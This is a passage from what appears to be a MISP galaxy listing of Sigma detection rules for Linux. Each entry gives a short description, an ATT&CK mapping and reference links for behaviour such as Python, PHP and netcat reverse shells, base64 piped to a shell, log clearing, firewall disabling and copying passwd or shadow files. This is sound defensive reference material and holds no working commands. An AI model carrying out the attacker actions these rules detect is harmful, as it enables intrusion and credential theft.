Table 11611. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml

Ufw Force Stop Using Ufw-Init

Detects attempts to force stop the ufw using ufw-init

The tag is: misp-galaxy:sigma-rules="Ufw Force Stop Using Ufw-Init"

Ufw Force Stop Using Ufw-Init has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11614. Table References

Links

https://blogs.blackberry.com/

https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml

System Network Discovery - Linux

Detects enumeration of local network configuration

The tag is: misp-galaxy:sigma-rules="System Network Discovery - Linux"

System Network Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 11615. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml

Suspicious Curl Change User Agents - Linux

Detects a suspicious curl process start on Linux with user-agent options set

The tag is: misp-galaxy:sigma-rules="Suspicious Curl Change User Agents - Linux"

Suspicious Curl Change User Agents - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11616. Table References

Links

https://curl.se/docs/manpage.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml

Potential Python Reverse Shell

Detects executing python with keywords related to network activity that could indicate a potential reverse shell

The tag is: misp-galaxy:sigma-rules="Potential Python Reverse Shell"

Table 11617. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml

Linux Webshell Indicators

Detects suspicious sub processes of web server processes

The tag is: misp-galaxy:sigma-rules="Linux Webshell Indicators"

Linux Webshell Indicators has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11618. Table References

Links

https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/

https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml

Scheduled Task/Job At

Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code

The tag is: misp-galaxy:sigma-rules="Scheduled Task/Job At"

Scheduled Task/Job At has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 11619. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml

Print History File Contents

Detects events in which someone prints the contents of history files to the command line or redirects them to a file for reconnaissance

The tag is: misp-galaxy:sigma-rules="Print History File Contents"

Print History File Contents has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004" with estimative-language:likelihood-probability="almost-certain"

Table 11620. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md

https://github.com/sleventyeleven/linuxprivchecker/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml

Crontab Enumeration

Detects usage of crontab to list the tasks of the user

The tag is: misp-galaxy:sigma-rules="Crontab Enumeration"

Crontab Enumeration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11621. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml

BPFtrace Unsafe Option Usage

Detects the usage of the unsafe bpftrace option

The tag is: misp-galaxy:sigma-rules="BPFtrace Unsafe Option Usage"

BPFtrace Unsafe Option Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11622. Table References

Links

https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/

https://bpftrace.org/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml

Potential PHP Reverse Shell

Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.

The tag is: misp-galaxy:sigma-rules="Potential PHP Reverse Shell"

Table 11623. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml

OMIGOD SCX RunAsProvider ExecuteScript

Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed is created as a temporary file in the /tmp folder with an scx* prefix, then invoked from the directory /etc/opt/microsoft/scx/conf/tmpdir/, where the file carries the same scx* prefix. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.

The tag is: misp-galaxy:sigma-rules="OMIGOD SCX RunAsProvider ExecuteScript"

OMIGOD SCX RunAsProvider ExecuteScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 11624. Table References

Links

https://github.com/Azure/Azure-Sentinel/pull/3059

https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml

Linux Base64 Encoded Pipe to Shell

Detects suspicious process command line that uses base64 encoded input for execution with a shell

The tag is: misp-galaxy:sigma-rules="Linux Base64 Encoded Pipe to Shell"

Linux Base64 Encoded Pipe to Shell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11625. Table References

Links

https://github.com/arget13/DDexec

https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml

Clear Linux Logs

Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion

The tag is: misp-galaxy:sigma-rules="Clear Linux Logs"

Clear Linux Logs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"

Table 11626. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml

Group Has Been Deleted Via Groupdel

Detects execution of the "groupdel" binary, which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks

The tag is: misp-galaxy:sigma-rules="Group Has Been Deleted Via Groupdel"

Group Has Been Deleted Via Groupdel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 11627. Table References

Links

https://www.cyberciti.biz/faq/linux-remove-user-command/

https://linuxize.com/post/how-to-delete-group-in-linux/

https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/

https://linux.die.net/man/8/groupdel

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml

Linux Base64 Encoded Shebang In CLI

Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded

The tag is: misp-galaxy:sigma-rules="Linux Base64 Encoded Shebang In CLI"

Linux Base64 Encoded Shebang In CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11628. Table References

Links

https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml

Capabilities Discovery - Linux

Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.

The tag is: misp-galaxy:sigma-rules="Capabilities Discovery - Linux"

Capabilities Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11629. Table References

Links

https://github.com/diego-treitos/linux-smart-enumeration

https://github.com/carlospolop/PEASS-ng

https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml

Linux Shell Pipe to Shell

Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell

The tag is: misp-galaxy:sigma-rules="Linux Shell Pipe to Shell"

Linux Shell Pipe to Shell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11630. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml

Curl Usage on Linux

Detects a curl process start on Linux, which indicates a file download from a remote location or a simple web request to a remote server

The tag is: misp-galaxy:sigma-rules="Curl Usage on Linux"

Curl Usage on Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11631. Table References

Links

https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml

ESXi System Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different components of the system, such as accounts, modules, NTP, etc.

The tag is: misp-galaxy:sigma-rules="ESXi System Information Discovery Via ESXCLI"

ESXi System Information Discovery Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11632. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html

https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml

Potential Linux Process Code Injection Via DD Utility

Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.

The tag is: misp-galaxy:sigma-rules="Potential Linux Process Code Injection Via DD Utility"

Potential Linux Process Code Injection Via DD Utility has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proc Memory - T1055.009" with estimative-language:likelihood-probability="almost-certain"

Table 11633. Table References

Links

https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh

https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml

Touch Suspicious Service File

Detects usage of the "touch" process on a service file.

The tag is: misp-galaxy:sigma-rules="Touch Suspicious Service File"

Touch Suspicious Service File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 11634. Table References

Links

https://blogs.blackberry.com/

https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml

ESXi Syslog Configuration Change Via ESXCLI

Detects changes to the ESXi syslog configuration via "esxcli"

The tag is: misp-galaxy:sigma-rules="ESXi Syslog Configuration Change Via ESXCLI"

ESXi Syslog Configuration Change Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Command History Logging - T1562.003" with estimative-language:likelihood-probability="almost-certain"

Table 11635. Table References

Links

https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml

Copy Passwd Or Shadow From TMP Path

Detects when the file "passwd" or "shadow" is copied from tmp path

The tag is: misp-galaxy:sigma-rules="Copy Passwd Or Shadow From TMP Path"

Copy Passwd Or Shadow From TMP Path has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11637. Table References

Links

https://blogs.blackberry.com/

https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml

Disable Or Stop Services

Detects the usage of utilities such as 'systemctl', 'service', etc. to stop or disable tools and services

The tag is: misp-galaxy:sigma-rules="Disable Or Stop Services"

Table 11638. Table References

Links

https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml

ESXi VM List Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.

The tag is: misp-galaxy:sigma-rules="ESXi VM List Discovery Via ESXCLI"

ESXi VM List Discovery Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11639. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html

https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html

https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/

https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml

Commands to Clear or Remove the Syslog

Detects specific commands commonly used to remove or empty the syslog, which is often used by attackers as a method to hide their tracks

The tag is: misp-galaxy:sigma-rules="Commands to Clear or Remove the Syslog"

Commands to Clear or Remove the Syslog has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"

Table 11640. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml

ESXi Storage Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.

The tag is: misp-galaxy:sigma-rules="ESXi Storage Information Discovery Via ESXCLI"

ESXi Storage Information Discovery Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11641. Table References

Links

https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html

https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml

ESXi Network Configuration Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.

The tag is: misp-galaxy:sigma-rules="ESXi Network Configuration Discovery Via ESXCLI"

ESXi Network Configuration Discovery Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11642. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html

https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml

Suspicious Java Children Processes

Detects java process spawning suspicious children

The tag is: misp-galaxy:sigma-rules="Suspicious Java Children Processes"

Suspicious Java Children Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11643. Table References

Links

https://www.tecmint.com/different-types-of-linux-shells/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml

Potential Container Discovery Via Inodes Listing

Detects listing of the inodes of the "/" directory to determine whether the process is running inside of a container.

The tag is: misp-galaxy:sigma-rules="Potential Container Discovery Via Inodes Listing"

Potential Container Discovery Via Inodes Listing has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11644. Table References

Links

https://blog.skyplabs.net/posts/container-detection/

https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml

Process Discovery

Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network

The tag is: misp-galaxy:sigma-rules="Process Discovery"

Process Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 11645. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml

Remove Immutable File Attribute

Detects usage of the 'chattr' utility to remove immutable file attribute.

The tag is: misp-galaxy:sigma-rules="Remove Immutable File Attribute"

Remove Immutable File Attribute has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

Table 11646. Table References

Links

https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml

Potential Suspicious Change To Sensitive/Critical Files

Detects changes to sensitive and critical files. Monitors files that you don’t expect to change without planning on a Linux system.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Change To Sensitive/Critical Files"

Potential Suspicious Change To Sensitive/Critical Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 11647. Table References

Links

https://docs.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml

OMIGOD SCX RunAsProvider ExecuteShellCommand

Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.

The tag is: misp-galaxy:sigma-rules="OMIGOD SCX RunAsProvider ExecuteShellCommand"

OMIGOD SCX RunAsProvider ExecuteShellCommand has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 11648. Table References

Links

https://github.com/Azure/Azure-Sentinel/pull/3059

https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml

Potential Netcat Reverse Shell Execution

Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.

The tag is: misp-galaxy:sigma-rules="Potential Netcat Reverse Shell Execution"

Potential Netcat Reverse Shell Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11649. Table References

Links

https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/

https://man7.org/linux/man-pages/man1/ncat.1.html

https://www.infosecademy.com/netcat-reverse-shells/

https://www.revshells.com/

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml

Nohup Execution

Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments

The tag is: misp-galaxy:sigma-rules="Nohup Execution"

Nohup Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11650. Table References

Links

https://www.computerhope.com/unix/unohup.htm

https://gtfobins.github.io/gtfobins/nohup/

https://en.wikipedia.org/wiki/Nohup

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml

Install Root Certificate

Detects installation of a new certificate on the system, which attackers may use to avoid warnings when connecting to controlled web servers or C2s

The tag is: misp-galaxy:sigma-rules="Install Root Certificate"

Install Root Certificate has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 11651. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml

Remove Scheduled Cron Task/Job

Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible

The tag is: misp-galaxy:sigma-rules="Remove Scheduled Cron Task/Job"

Table 11652. Table References

Links

https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml

Potentially Suspicious Named Pipe Created Via Mkfifo

Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Named Pipe Created Via Mkfifo"

Table 11653. Table References

Links

https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally

https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml

Connection Proxy

Detects the setting of a proxy configuration

The tag is: misp-galaxy:sigma-rules="Connection Proxy"

Connection Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 11654. Table References

Links

https://attack.mitre.org/techniques/T1090/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml

ESXi VSAN Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.

The tag is: misp-galaxy:sigma-rules="ESXi VSAN Information Discovery Via ESXCLI"

ESXi VSAN Information Discovery Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11655. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html

https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html

https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml

Docker Container Discovery Via Dockerenv Listing

Detects listing or file reading of ".dockerenv", which can be a sign of potential container discovery

The tag is: misp-galaxy:sigma-rules="Docker Container Discovery Via Dockerenv Listing"

Docker Container Discovery Via Dockerenv Listing has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11656. Table References

Links

https://blog.skyplabs.net/posts/container-detection/

https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml

ESXi Account Creation Via ESXCLI

Detects user account creation on ESXi system via esxcli

The tag is: misp-galaxy:sigma-rules="ESXi Account Creation Via ESXCLI"

ESXi Account Creation Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"

Table 11657. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml

File Deletion

Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity

The tag is: misp-galaxy:sigma-rules="File Deletion"

File Deletion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 11659. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml

Potential Linux Amazon SSM Agent Hijacking

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

The tag is: misp-galaxy:sigma-rules="Potential Linux Amazon SSM Agent Hijacking"

Potential Linux Amazon SSM Agent Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 11660. Table References

Links

https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/

https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/

